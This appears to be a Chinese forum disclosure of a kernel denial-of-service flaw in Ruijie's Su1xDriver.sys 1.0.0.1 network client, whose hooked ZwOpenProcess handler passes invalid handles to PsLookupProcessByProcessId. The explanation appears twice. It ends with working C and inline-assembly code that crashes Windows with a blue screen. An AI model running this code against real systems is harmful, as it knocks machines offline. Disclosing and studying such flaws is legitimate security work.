锐捷Su1xDriver.sys 1.0.0.1 内核拒绝服务漏洞
福州大学采用了星网锐捷的上网客户端,漏洞位于其Su1xDriver.sys内核模块偏移0x1119F处。
锐捷为了保护应用层的SuService.exe,通过其内核模块Su1xDriver.sys hook了SSDT中的ZwOpenProcess函数,但在偏移0x112C0处的代理函数My_OpenProcess中未过滤传递无效句柄,直接调用PsLookupProcessByProcessId函数而导致内核拒绝服务。
蓝屏触发代码如下:
欢迎交流 :-)
福州大学采用了星网锐捷的上网客户端,漏洞位于其Su1xDriver.sys内核模块偏移0x1119F处。
锐捷为了保护应用层的SuService.exe,通过其内核模块Su1xDriver.sys hook了SSDT中的ZwOpenProcess函数,但在偏移0x112C0处的代理函数My_OpenProcess中未过滤传递无效句柄,直接调用PsLookupProcessByProcessId函数而导致内核拒绝服务。
蓝屏触发代码如下:
代码:
/* Test for RuiJie */ #include<stdio.h> #include<windows.h> HMODULE hMod; PVOID Func; int main() { hMod = LoadLibrary("ntdll.dll"); Func = GetProcAddress(hMod ,"ZwOpenProcess"); __asm{ push 0x80000000 push 0 push 0 push 0 call Func } return 0; }